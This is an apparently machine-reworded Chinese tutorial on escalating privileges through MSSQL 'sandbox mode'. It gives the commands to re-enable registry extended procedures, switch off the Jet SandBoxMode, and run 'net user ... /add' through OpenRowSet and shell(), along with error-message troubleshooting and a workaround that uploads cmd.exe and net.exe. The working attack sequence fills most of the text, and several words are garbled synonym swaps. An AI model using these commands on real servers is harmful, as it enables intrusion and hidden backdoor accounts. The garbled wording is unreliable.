MSSQL沙盒模式提权问题总结






恢复对注册表的读写存储。

dbcc addextendedproc ('xp_regread','xpstar.dll')

dbcc addextendedproc ('xp_regwrite','xpstar.dll')



修复沙盒的维护模式

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

查看'SandBoxMode'值是否已经变成0了。

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'



最后调用沙盒模式

Select . From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Databasec:\windows\system32\ias\ias.mdb','select shell( net user itpro gmasfm /add )');

1.如果沙盒掩护模式未 封闭 ，会报错：

服务器: 消息 7357，级别 16，状态 2，行 1

未能处理对象 'select shell( cmd.exe /c net user user passwd /add )'。OLE DB 提供程序 'microsoft.jet.oledb.4.0' 指出该对象中没有任何列。

OLE DB 错误跟踪.Noninterface error: OLE DB provider unable to process object, since the object has no columnsProviderName'microsoft.jet.oledb.4.0', Queryselect shell( cmd.exe /c net user user passwd /add )'.。



2.如果.mdb不存在或是输入门路错误

服务器: 消息 7399，级别 16，状态 1，行 1

OLE DB 供给程序 'microsoft.jet.oledb.4.0' 报错。

.OLE/DB provider returned message: 找不到文件 'C:WINDOWSsystem32iasdnary1.mdb'。.

OLE DB 错误跟踪.OLE/DB Provider 'microsoft.jet.oledb.4.0' IDBInitialize::Initialize returned 0x80004005: .。



3.如果输入进程中多了一些空格，也会报错。尤其要留神这点，良多人直接网上找文章复制粘贴进去执行。

服务器: 消息 7357，级别 16，状态 2，行 1

未能处置对象 'select shell( cmd.exe /c net user user passwd /add )'。OLE DB 提供程序 'microsoft.jet.oledb.4.0' 指出该对象中不任何列。

OLE DB 毛病跟踪.Noninterface error: OLE DB provider unable to process object, since the object has no columnsProviderName'microsoft.jet.oledb.4.0', Queryselect shell( cmd.exe /c net user user passwd /add )'.。



4.假如mdb权限和cmd.exe权限错误，同样会也呈现问题。

当mdb权限不对时，

服务器: 新闻 7320，级别 16，状况 2，行 1

未能对 OLE DB 提供程序 'Microsoft.Jet.OLEDB.4.0' 执行查问。

.OLE/DB provider returned message: 未知.

OLE DB 过错跟踪.OLE/DB Provider 'Microsoft.Jet.OLEDB.4.0' ICommandText::Execute returned 0x80040e14.。



5.如果net权限不对时，却没有任何提醒。

终极的提权措施就是在当前的web目录下面上传体系的ias.mdb跟cmd.exe，net.exe三个文件。履行

select . from openrowset('microsoft.jet.oledb.4.0',';databaseE:\we\bias.mdb','select shell( E:\web\cmd.exe /c E:\web\net.exe user user passwd /add )')

胜利增添一个盘算机用户